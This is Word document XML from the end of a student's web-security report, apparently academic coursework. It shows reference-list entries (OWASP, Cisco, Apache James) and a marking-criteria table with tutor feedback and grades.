        </w:rPr>
        <w:t>techtarget.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017. [Online]. Available: http://searchsecurity.techtarget.com/definition/AAA-server. [Accessed: 11-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE209F5"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[116]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">OWASP, “Forced Browsing Software Attack | OWASP Foundation,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2020. [Online]. Available: https://owasp.org/www-community/attacks/Forced_browsing. [Accessed: 11-May-2020].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A4D459" w14:textId="77777777" w:rsidR="009B0288" w:rsidRDefault="009B0288" w:rsidP="009B0288">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[117]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Cisco.com, “Access Control Lists (ACL),” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cisco.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7313BA" w14:textId="77777777" w:rsidR="009B0288" w:rsidRDefault="009B0288" w:rsidP="009B0288">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[118]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Apache, “Apache James,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2020. [Online]. Available: https://james.apache.org/. [Accessed: 11-May-2020].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D7EB57" w14:textId="75C8A5A7" w:rsidR="009B0288" w:rsidRPr="009B0288" w:rsidRDefault="009B0288" w:rsidP="009B0288">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9C414B" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="00C5650F"/>
    <w:p w14:paraId="2B9C414C" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="00C5650F"/>
    <w:p w14:paraId="6D760EBC" w14:textId="77777777" w:rsidR="00556C31" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:sectPr w:rsidR="00556C31">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:formProt w:val="0"/>
          <w:docGrid w:linePitch="360" w:charSpace="4096"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2175FC51" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C3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6C31" w:rsidRPr="00556C31" w14:paraId="0CC3EEC0" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10670" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:p w14:paraId="465D84FE" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br w:type="page"/>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:caps/>
                <w:sz w:val="40"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">                 marking criteria and Student FEEDBACK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53AAF37F" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604C2E5E" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556C31">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This section details the assessment criteria. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00556C31">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extent</w:t>
      </w:r>
      <w:r w:rsidRPr="00556C3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9BC72E" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C3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56C31" w:rsidRPr="00556C31" w14:paraId="144633C9" w14:textId="77777777" w:rsidTr="00556C3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35134B" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Common Assessment Criteria </w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Applied </w:t>
            </w:r>
            <w:bookmarkStart w:id="66" w:name="assessmentComponent"/>
            <w:bookmarkEnd w:id="66"/>
            <w:r w:rsidRPr="00556C3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31E716" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="34"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7AEB5E" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="113"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 xml:space="preserve">Marks </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22A44DB7" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="113"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awarded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="071C8C55"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643D5260"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1. E</w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>ngagement with Literature Skills</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F8E1B19"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B248FA"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A66FD2"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2FD6AE3F" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6D403F77" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="67" w:name="feedbackRIL"/>
            <w:bookmarkEnd w:id="67"/>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>You have engaged excellently with the literature and covered the key concepts within your research aspect and focus on security measures and flaws. You have used diverse sources and material. You have apply the appropriate referencing convention. (Grade mark: 95.56%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="54CFA6F9"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68" w:name="totalRIL"/>
            <w:bookmarkEnd w:id="68"/>
            <w:r w:rsidRPr="00556C31">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D458A48"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69" w:name="markRIL"/>
            <w:bookmarkEnd w:id="69"/>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="0A8ADCEA" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59E7624E"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B325C0"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BC014E"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70954305"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0C49ACBE" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Knowledge and Understanding Skills</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01749D30"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1BEFBB3"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CAE3E3"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4B90E320" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="29390291" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="70" w:name="feedbackKUS"/>
            <w:bookmarkEnd w:id="70"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0B242FF3"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1" w:name="totalKUS"/>
            <w:bookmarkEnd w:id="71"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="06502465"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2" w:name="markKUS"/>
            <w:bookmarkEnd w:id="72"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="13ABB41F" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="10661174"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B845EA"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5EF361"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374E1EFC"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3D29C19C"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3. </w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Cognitive and Intellectual Skills</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F547EE"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D5292A"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98F078"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4CD54839" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4B0778E5" w14:textId="4D705E4E" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="73" w:name="feedbackANA"/>
            <w:bookmarkEnd w:id="73"/>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>You have demonstrated critical analysis of the research areas. You have discuss thoroughly, cloud based services and security, operation system architectures and protocol security, Linux webserver vulnerability, webserver protocols and port security, HTML5 and database security.  (Grade mark: 95.56%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="78B5D0BD"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4" w:name="totalANA"/>
            <w:bookmarkEnd w:id="74"/>
            <w:r w:rsidRPr="00556C31">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215E3E9"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5" w:name="markANA"/>
            <w:bookmarkEnd w:id="75"/>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="5CF417DD" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2D407FCF"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73FE85"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F7F162"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7D34AED6"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1B445C45"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4. </w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Practical Application Skills</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28947485"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46E7A8"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3213F6"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1C8B8EE3" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69244C37" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="76" w:name="feedbackPAD"/>
            <w:bookmarkEnd w:id="76"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="308CB937"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7" w:name="totalPAD"/>
            <w:bookmarkEnd w:id="77"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21AA47A7"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78" w:name="markPAD"/>
            <w:bookmarkEnd w:id="78"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="1D9B42E0" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="30F55D4D"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092DB6"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2B77B0"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7C46E549"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68615E18"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5. </w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Transferable Skills for Life and Professional Practice</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A63ACEF"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CEE5471"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2A6A90"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0E6A7CED" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46D70C98" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="79" w:name="feedbackSPP"/>
            <w:bookmarkEnd w:id="79"/>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Your work is professionally done, flow and written excellently. (Grade mark: 100.00%)</w:t>
